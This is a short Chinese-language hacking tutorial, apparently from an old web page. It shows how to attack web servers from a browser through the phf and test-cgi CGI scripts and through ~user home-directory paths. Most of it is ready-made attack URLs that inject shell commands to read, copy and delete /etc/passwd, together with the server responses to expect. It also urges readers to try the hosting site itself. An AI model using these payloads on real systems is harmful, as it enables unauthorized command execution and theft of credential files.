|
在本章我将讲述一些利用浏览器来进行攻击的方法<br/> 1。大家都知道了phf攻击了,phf是cgi script,很多站点都有这个大漏洞啦,使用<br/> http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd指令可以拿到那个站点的passwd.但还有些更好的执行方法呦如:<br/> http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna</p><p> me=&Qoffice_phone=<br/> http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=<br/> haqr&Qemail=&Qnickname=&Qoffice_phone=<br/> http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd<br/> %0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=<br/> http://thegnome.com/~someuser/passwd<br/> http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname</p><p> =haqr&Qemail=&Qnickname=&Qoffice_phone=<br/> 上面执行的命令是<br/> id<br/> ls -la ~someuser<br/> cp /etc/passwd ~someuser/passwd<br/> rm ~someuser/passwd</p><p> 2。有关test攻击<br/> http://thegnome.com/cgi-bin/test-cgi?\whatever<br/> 服务器会应答,本服务器的一些情况如:<br/> CGI/1.0 test script report:</p><p> argc is 0. argv is .</p><p> SERVER_SOFTWARE = NCSA/1.4B<br/> SERVER_NAME = thegnome.com<br/> GATEWAY_INTERFACE = CGI/1.1<br/> SERVER_PROTOCOL = HTTP/1.0<br/> SERVER_PORT = 80<br/> REQUEST_METHOD = GET<br/> HTTP_ACCEPT = text/plain, application/x-html, application/html, <br/> text/html, text/x-html<br/> PATH_INFO =<br/> PATH_TRANSLATED =<br/> SCRIPT_NAME = /cgi-bin/test-cgi<br/> QUERY_STRING = whatever<br/> REMOTE_HOST = fifth.column.gov<br/> REMOTE_ADDR = 200.200.200.200<br/> REMOTE_USER =<br/> AUTH_TYPE =<br/> CONTENT_TYPE =<br/> CONTENT_LENGTH =</p><p> 好吧,让我们来点赶兴趣的<br/> http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd</p><p> 3。~的应用<br/> ~主要是用在很多的个人主页上的快捷目录的方法,如果我们使用这样的~<br/> http://thegnome.com/~root<br/> http://thegnome.com/~root/etc/passwd<br/> 不是在任何平台上都通过呦,在BSD Apache上曾经成功过,当然还可以试试~bin ,~etc,~uucp.....<br/> 看到这个站点了吗,本站所在的这个站点就是用这种形式的,如果我们打入 本站所在的web地址/~bin<br/> 出现了什么,你看到了吗?然后...............注意请不要破坏<br/> |
|